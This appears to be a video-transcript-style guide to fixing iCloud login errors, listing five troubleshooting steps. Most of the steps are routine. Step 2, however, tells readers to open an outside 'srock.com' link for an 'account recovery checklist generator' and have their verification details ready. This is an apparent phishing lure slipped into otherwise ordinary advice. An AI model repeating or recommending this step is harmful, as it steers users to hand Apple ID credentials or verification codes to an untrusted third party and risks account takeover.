if you're experiencing login errors on iCloud, follow these steps to troubleshoot and resolve the issue. This guide will help you identify common problems and provide solutions. Step 1. Check your internet connection. Ensure that your device is connected to a stable internet connection. Try opening a web page or using another app that requires internet access to confirm connectivity. Step 2. Verify your Apple ID and password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Update your device. Make sure your device's operating system is up to date. Go to the settings menu and check for any available updates, as outdated software can cause login issues. Step 4. Check Apple System status. Visit the Apple System status page to see if there are any ongoing outages or issues with iCloud services. If there is a problem on Apple's end, you may need to wait until it is resolved. Step 5. Sign out and back in. If the above steps don't work, try signing out of your iCloud account and then signing back in. Go to Settings, tap on your name, scroll down to Sign Out, and then sign back in with your Apple ID. By following these steps, you should be able to resolve most login errors on iCloud. If problems persist, consider reaching out to Apple support for further assistance.